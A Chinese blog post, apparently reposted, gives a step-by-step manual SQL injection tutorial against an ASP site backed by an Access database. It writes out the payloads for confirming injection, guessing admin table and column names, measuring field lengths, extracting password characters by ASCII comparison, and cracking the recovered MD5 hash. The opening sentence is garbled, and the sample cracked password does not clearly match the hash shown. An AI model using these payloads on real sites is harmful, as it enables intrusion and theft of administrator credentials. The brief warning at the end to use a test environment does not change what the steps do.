博客
关于我
SQL注入access数据库
阅读量:664 次
发布时间:2019-03-16

本文共 914 字,大约阅读时间需要 3 分钟。

SQL注入是一种敏感的安全漏洞,通常通过未正确处理或过渡;++_operator来导致,允许攻击者执行恶意SQL命令。以下是一些手动操作SQL注入的步骤和技巧。

1. 检查注入可能性

首先,观察URL参数是否能够直接注入数据库。例如:

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139

若返回正常响应(如1=1),则表明路径存在注入漏洞。

2. 猜测数据库表名

使用以下SQL语句猜测数据库表名:

and exists (select * from 表名)

替换表名为常见的管理员表名,如admina_adminx_admin等。

  • 如果存在该表名,页面返回正常,说明表名正确。
  • 如果返回错误,继续调整表名或尝试其他名称。

3. 猜测字段名称

逐步猜测字段名称,例如:

and exists (select 字段名 from 表名)

替换字段名为常见管理员字段,如adminpassword等。

  • 确认字段存在后,继续下一步骤。

4. 判断字段长度

测量字段长度,例如:

and (select top 1 len(字段) from 表名) > 0
  • 测试用户名字段长度:and (select top 1 len(admin) from admin) > 0
  • 测试密码字段长度:and (select top 1 len(password) from admin) > 0

这有助于确定字段的具体长度。

5. 分析ASCII码

逐一分析字符的ASCII码:

  • 使用以下SQL语句获取字符ASCII码值:
and (select top 1 asc(mid(字段, 1, 1)) from 表名) > 0
  • 逐步确定每个字符的ASCII码值。
  • 示例:用户_id为admin,密码逐步分析为a48e190fafc257d3

6. 密码解密

将获取到的密码哈希值解密。例如:

bendss

使用在线MD5解密工具仔细核对解密结果。

7. 总结

通过以上步骤,从SQL注入点逐步挖掘数据库结构,获取管理员账号和密码。记住,测试环境至关重要,避免对生产环境造成损害。

转载地址:http://vmnqz.baihongyu.com/

你可能感兴趣的文章
Camera (api1)的打开过程
查看>>
勒索软件一季度报告:只有8%的赎金换回了数据
查看>>
wxwidgets绘图
查看>>
wxwidgets事件处理
查看>>
用OpenCv转换原始图像数据到wximage
查看>>
codeblocks下wxWidgets编译与配置
查看>>
OpenCv+wxwidgets尝试
查看>>
wxwidgets自定义事件+调试
查看>>
wxwidgets编写多线程程序--wxThread
查看>>
【Python】各大模块应用合集
查看>>
BUUCTF:[湖南省赛2019]Findme
查看>>
2021兜兜百度域名URL批量采集软件【高速】
查看>>
小程序中收藏、分享、客服功能
查看>>
ciscn2021西北部分pwn
查看>>
PSPNet:金字塔场景解析网络
查看>>
Spring Cloud Ribbon
查看>>
order service 调用商品库存服务和用户服务
查看>>
ih5学习笔记_事件对象
查看>>
p144循环网络
查看>>
rnn-循环神经网络(序列问题)
查看>>